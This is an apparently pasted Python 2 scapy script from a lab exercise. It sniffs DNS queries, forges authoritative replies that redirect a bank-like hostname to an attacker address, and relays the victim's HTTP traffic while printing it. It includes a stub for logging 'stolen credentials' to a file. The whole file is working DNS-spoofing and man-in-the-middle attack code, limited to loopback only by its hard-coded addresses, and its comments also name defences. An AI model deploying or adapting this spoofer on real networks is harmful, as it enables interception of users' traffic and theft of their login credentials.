
Untitled

a guest Jun 8th, 2017 121 Never
import argparse
import socket
from scapy.all import *

# Setup for a DNS-spoofing / TCP-relay lab exercise. Every address and
# interface used in this file is a loopback one (127.x.x.x, iface='lo').

# Send layer-3 packets through scapy's raw socket; scapy's documentation
# recommends this setting when send() targets loopback addresses on Linux.
conf.L3socket = L3RawSocket
# TCP port used both for the local listening socket (sniff_and_spoof) and for
# the upstream connection to the real host (handle_tcp_forwarding).
WEB_PORT = 8000
# Name handed to handle_tcp_forwarding() as the host to relay to. Nothing in
# this file compares it against the name inside a sniffed DNS query.
HOSTNAME = "fakeBank.com"
def resolveHostname(hostname):
    """Return the address the relay treats as the real server for ``hostname``.

    The argument is ignored: the lab hard-codes a loopback address in place of
    the DNS lookup that would normally supply it.
    """
    upstream_ip = "127.1.1.1"
    return upstream_ip
def log_credentials(username, password):
    """Write one captured username/password pair to the lab's output file.

    The file is opened in "wb" mode, so each call replaces whatever an earlier
    call wrote; only the most recent pair is kept. The pair is stored in
    plaintext.
    """
    out_path = "lib/attacker/StolenCreds.txt"
    with open(out_path, "wb") as out_file:
        # Build the record after the file is open, as the original did, so a
        # bad argument type fails at the same point.
        record = "Stolen credentials: username=" + username + " password=" + password
        out_file.write(record)
def check_credentials(client_data):
        # Inspect one block of data received from the client.
        # TODO: Take a block of client data and search for username/password credentials
        # If found, log the credentials to the system by calling log_credentials().
        # As written, the search is not implemented: the function only echoes
        # the raw block to stdout, so whatever the client sent appears in the
        # console output.
        print client_data
def handle_tcp_forwarding(client_socket, client_ip, hostname):
    """Relay one request/response exchange per accepted client connection.

    ``client_socket`` must already be bound; it is put into the listening
    state here. For every accepted connection the function opens a new TCP
    connection to ``resolveHostname(hostname)`` on ``WEB_PORT``, reads up to
    5000 bytes from the client, prints them, passes them to
    ``check_credentials()``, forwards them upstream, and sends up to 5000
    bytes of the reply back to the client.

    ``client_ip`` is accepted but not used. The loop has no exit condition
    (the '/post_logout' check named in the assignment is not implemented),
    the accepted connection is never closed, and anything beyond a single
    5000-byte read in either direction is not relayed.
    """
    client_socket.listen(1)
    while True:
        print "before accept"
        client_conn, client_addr = client_socket.accept()
        print "after accept"

        # One fresh upstream connection per accepted client connection.
        upstream = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        upstream_addr = (resolveHostname(hostname), WEB_PORT)
        upstream.connect(upstream_addr)

        # The request is read and echoed as raw bytes, so its contents are
        # only readable here when the client sends unencrypted HTTP.
        request = client_conn.recv(5000)
        print request
        check_credentials(request)
        upstream.send(request)

        response = upstream.recv(5000)
        client_conn.send(response)
        upstream.close()
def dns_callback(packet, extra_args):
    """Answer a sniffed DNS packet with a forged reply, then start the relay.

    ``extra_args`` is a ``(source_ip, sock)`` pair: the address placed in the
    forged answer and the bound TCP socket later given to
    ``handle_tcp_forwarding()``.

    The reply swaps the sniffed packet's IP addresses and UDP ports, copies
    its DNS transaction id and question section, sets ``qr=1`` and ``aa=1``,
    and carries a single answer record (ttl 10) mapping the queried name to
    ``source_ip``.

    Nothing here checks that the queried name equals ``HOSTNAME`` or that the
    sniffed packet is a query rather than a response, so every packet the
    sniff filter delivers is answered. ``handle_tcp_forwarding()`` loops
    forever, so this callback does not return after its first invocation.

    Defensive context: the forgery depends on observing the query (id and
    ports are copied from it) and on the client accepting an unauthenticated
    answer; encrypted resolver transport (DoT/DoH) addresses the former,
    DNSSEC validation the latter.
    """
    source_ip, sock = extra_args

    ip_layer = packet[IP]
    client_ip = ip_layer.src
    print "client_ip: ", client_ip

    # Reply travels back along the reversed address/port pair.
    reply_ip = IP(src=ip_layer.dst, dst=ip_layer.src)
    udp_layer = packet[UDP]
    reply_udp = UDP(sport=udp_layer.dport, dport=udp_layer.sport)

    query = packet.getlayer(DNS)
    answer = DNSRR(rrname=query.qd.qname, ttl=10, rdata=source_ip)
    reply_dns = DNS(id=query.id, qd=query.qd, qr=1, aa=1, an=answer)

    spoof_msg = reply_ip / reply_udp / reply_dns
    send(spoof_msg)
    print spoof_msg.summary()

    handle_tcp_forwarding(sock, client_ip, HOSTNAME)
def sniff_and_spoof(source_ip):
    """Bind the relay's TCP socket and start sniffing DNS traffic on loopback.

    A TCP socket is bound to ``(source_ip, WEB_PORT)``; it is not put into
    the listening state here (``handle_tcp_forwarding()`` does that). Scapy
    then sniffs interface 'lo' with the capture filter 'udp port 53' and
    passes each matching packet, together with ``(source_ip, socket)``, to
    ``dns_callback()``.

    The filter matches on port only, so DNS responses on port 53 are
    delivered to the callback as well as queries.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind((source_ip, WEB_PORT))

    callback_args = (source_ip, listener)

    def on_packet(packet, args=callback_args):
        # Adapter: scapy calls prn with the packet only.
        return dns_callback(packet, args)

    sniff(filter='udp port 53', prn=on_packet, iface='lo')
def main():
    """Parse the command line and start the sniffer.

    ``--source_ip`` is optional and defaults to "127.0.0.3".
    """
    cli = argparse.ArgumentParser(
        description='Attacker who spoofs dns packet and hijacks connection')
    # NOTE(review): with nargs='?' and const=1, a bare "--source_ip" with no
    # value yields the integer 1 rather than an address string.
    cli.add_argument(
        '--source_ip',
        nargs='?',
        const=1,
        default="127.0.0.3",
        help='ip of the attacker',
    )

    options = cli.parse_args()
    sniff_and_spoof(options.source_ip)
# Start the lab only when this file is executed as a script, not on import.
if __name__=="__main__":
        main()